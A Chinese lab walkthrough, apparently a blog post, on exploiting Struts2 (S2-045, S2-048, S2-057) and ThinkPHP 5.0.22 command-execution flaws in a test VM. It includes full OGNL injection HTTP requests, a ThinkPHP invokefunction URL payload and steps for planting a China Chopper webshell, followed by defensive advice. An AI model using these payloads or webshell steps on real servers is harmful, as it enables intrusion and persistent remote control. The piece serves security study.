命令执行漏洞(二)

Struts2框架命令执行漏洞

环境准备:虚拟机win2003     jspstudy2016     Struts Showcase靶场环境

查看历史相关漏洞在线平台

乌云(WooYun.org)历史漏洞查询:

https://wy.zone.ci/searchbug.php?q=Struts2

知道创宇 Seebug 漏洞平台:

https://www.seebug.org/search/?keywords=struts2

 

漏洞扫描

 利用struts2漏洞检测工具对 Struts Showcase 靶场进行扫描:

http://10.0.0.101:90/struts2-showcase/showcase.action

(在线工具包)

 Struts Showcase 靶场发现以下漏洞:

 POST方法,S2-046-bypass漏洞存在!!!,程序更改为S2-046-bypass漏洞测试模式, 响应码: 200 
POST方法,S2-046-1漏洞存在!!!,程序更改为S2-046-1漏洞测试模式, 响应码: 200 
POST方法,S2-046-2漏洞存在!!!,程序更改为S2-046-2漏洞测试模式, 响应码: 200 
POST方法,S2-046-3漏洞存在!!!,程序更改为S2-046-3漏洞测试模式, 响应码: 200 
POST方法,S2-045-bypass漏洞存在!!!,程序更改为S2-045-bypass漏洞测试模式, 响应码: 200 
POST方法,S2-045-bypass-2漏洞存在!!!,程序更改为S2-045-bypass-2漏洞测试模式, 响应码: 200 
POST方法,S2-045-1漏洞存在!!!,程序更改为S2-045-1漏洞测试模式, 响应码: 200 
POST方法,S2-045-2漏洞存在!!!,程序更改为S2-045-2漏洞测试模式, 响应码: 200
POST方法,S2-045-3漏洞存在!!!,程序更改为S2-045-3漏洞测试模式, 响应码: 200 
POST方法,S2-045-4漏洞存在!!!,程序更改为S2-045-4漏洞测试模式, 响应码: 200

 

 

S2-045漏洞利用过程
扫描漏洞:利用工具【在线工具包-漏洞利用-struts2漏洞检查】
可以执行系统命令:(创建账户等)


漏洞利用:上传带上传功能的小马到目标主机,网页访问执行小马文件,菜刀马代码上传到小马上提交,用中国菜刀远程连接。

 利用S2-045漏洞上传带上传功能的小马到目标主机:(直接上传菜刀马尝试失败)

目标地址:c:\\jspstudy\\www\\lan.jsp

\\双斜杠防止被转义

小马上传成功:

 阅览器访问小马,成功访问:

http://10.0.0.101:8080/lan.jsp

加载打开带有上传功能小马文件,把菜刀马代码写到小马里进行上传。

http://10.0.0.101:8080/lan.jsp  --根目录下lan.jsp文件(c:\jspstudy\www\lan.jsp)

小马里填写:
--Target File Path:
C:\JspStudy\WWW\muma.jsp 

--Target File Content:
菜刀马代码内容

submit提交
 

 菜刀马上传成功:

 

打开中国菜刀软件远程连接目标主机:

http://10.0.0.101:8080/muma.jsp

连接成功

S2-048漏洞利用过程
漏洞位置:http://10.0.0.101:8080/struts2-showcase/integration/saveGangster.action 
利用【音速软件-抓包改包-WSExplorer(岁月联盟)】进程抓包。
打开音速软件-漏洞利用-Struts2漏洞检查工具2018版.exe-执行whoami命令-用WSExplorer(岁月联盟)】抓取进程。

 

 

POST /struts2-showcase/showcase.action HTTP/1.1
Host:10.0.0.101:8080
Accept-Language: zh_CN
User-Agent: Auto Spider 1.0
Accept-Encoding: gzip, deflate
Connection: close 
Content-Length: 1119
Content-Type: application/x-www-form-urlencoded

name=%25%7b(%23test%3d%27multipart%2fform-data%27).(%23dm%3d%40ognl.OgnlContext%40DEFAULT_MEMBER_ACCESS).(%23_memberAccess%3f(%23_memberAccess%3d%23dm)%3a((%23container%3d%23context%5b%27com.opensymphony.xwork2.ActionContext.container%27%5d).(%23ognlUtil%3d%23container.getInstance(%40com.opensymphony.xwork2.ognl.OgnlUtil%40class)).(%23ognlUtil.getExcludedPackageNames().clear()).(%23ognlUtil.getExcludedClasses().clear()).(%23context.setMemberAccess(%23dm)))).(%23req%3d%40org.apache.struts2.ServletActionContext%40getRequest()).(%23res%3d%40org.apache.struts2.ServletActionContext%40getResponse()).(%23res.setContentType(%27text%2fhtml%3bcharset%3dUTF-8%27)).(%23res.getWriter().print(%27start%3a%27)).(%23s%3dnew+java.util.Scanner((new+java.lang.ProcessBuilder(%27whoami%27.toString().split(%27%5c%5cs%27))).start().getInputStream()).useDelimiter(%27%5c%5cAAAA%27)).(%23str%3d%23s.hasNext()%3f%23s.next()%3a%27%27).(%23res.getWriter().print(%23str)).(%23res.getWriter().print(%27%3aend%27)).(%23res.getWriter().flush()).(%23res.getWriter().close()).(%23s.close())%7d&age=a&__checkbox_bustedBefore=true&description=s


S2-057漏洞复现

首先在struts.xml配置文件添加<constant name="struts.mapper.alwaysSelectFullNamespace" value="true" />

次修改配置文件struts-actionchaining.xml 删掉namespace属性,或使用了通配符* 最后把type="chain"改成type="redirectAction"

打开音速软件-漏洞利用-Struts2漏洞检查工具2018版.exe-执行whoami命令-用WSExplorer(岁月联盟)】抓取进程

POST /struts2-showcase//%25%7b(%23dm%3d%40ognl.OgnlContext%40DEFAULT_MEMBER_ACCESS).(%23_memberAccess%3f(%23_memberAccess%3d%23dm)%3a((%23container%3d%23context%5b%27com.opensymphony.xwork2.ActionContext.container%27%5d).(%23ognlUtil%3d%23container.getInstance(%40com.opensymphony.xwork2.ognl.OgnlUtil%40class)).(%23ognlUtil.getExcludedPackageNames().clear()).(%23ognlUtil.getExcludedClasses().clear()).(%23context.setMemberAccess(%23dm)))).(%23str%3d%40org.apache.commons.io.IOUtils%40toString(%40java.lang.Runtime%40getRuntime().exec(%27whoami%27).getInputStream())).(%23res%3d%40org.apache.struts2.ServletActionContext%40getResponse()).(%23res.addHeader(%27cmd%27%2c%23str))%7d/actionChain1.action HTTP/1.1
Host:10.0.0.101:8080
Accept-Language: zh_CN
User-Agent: Auto Spider 1.0
Accept-Encoding: gzip, deflate
Connection: close
Content-Length: 0
Content-Type: application/x-www-form-urlencoded


--struts2攻击特征(关键字):
--java唯一代码函数:getRuntime().exec
--apache.struts2
--看扩展名xxx.action  / .do

Thinkphp命令执行

环境准备: 虚拟机win2003     phpstudy   thinkphp_5.0.22靶场

http://10.0.0.101:90/thinkphp/public/index.php

Thinkphp框架

漏洞复现

在url输出关于PHP 配置的信息:
http://10.0.0.101:90/thinkphp/public/index.php?s=index/\think\app/invokefunction&function=phpinfo&vars[0]=100

参考网站:https://blog.csdn.net/weixin_44862511/article/details/132132998

可利用在线工具包-综合利用工具


命令执行漏洞的安全防范涉及多个层面,包括设计、编码、测试和运维。以下是关键的防范措施:

  1. 输入验证 (Input Validation):

    • 对所有用户输入进行严格的验证,确保输入的数据类型、长度和内容符合预期。
    • 使用预定义的白名单列表限制可接受的字符或值。
    • 避免使用可能导致命令注入的动态命令构造,如拼接字符串生成命令。
  2. 参数化查询或预编译语句:

    • 在处理数据库查询时,使用参数化查询或预编译语句,防止SQL注入式地转化为命令执行。
  3. 最小权限原则:

    • 应用程序和服务应以尽可能低的权限运行,避免使用管理员权限,减少潜在损害。
  4. 使用安全的库和框架:

    • 选择经过充分测试、有良好安全记录的库和框架,它们可能已经内置了防止命令执行的防护措施。
  5. 代码审查:

    • 定期进行代码审查,查找可能的命令注入点和不安全的代码实践。
  6. 沙箱环境:

    • 对于必须执行外部命令的情况,使用沙箱环境限制其执行权限和资源访问。
  7. 日志监控和入侵检测系统:

    • 实施日志记录和分析,以便在异常活动发生时能及时发现。
    • 使用入侵检测系统(IDS)或入侵防御系统(IPS)来检测和阻止潜在的攻击。
  8. 安全配置:

    • 确保操作系统和其他服务配置正确,关闭不必要的端口和服务,减少攻击面。
  9. 持续更新和打补丁:

    • 及时安装软件更新和安全补丁,以修复已知的漏洞。
  10. 安全编码最佳实践:

    • 遵循OWASP(开放网络应用安全项目)等组织提供的安全编码指南。

声明:

  • 此文章只做技术研究,谨遵守国家相关法律法规,请勿用于违法用途,如果您对文章内容有疑问,可以尝试留言私信,如有侵权请联系小编处理。
  • 14
    点赞
  • 29
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值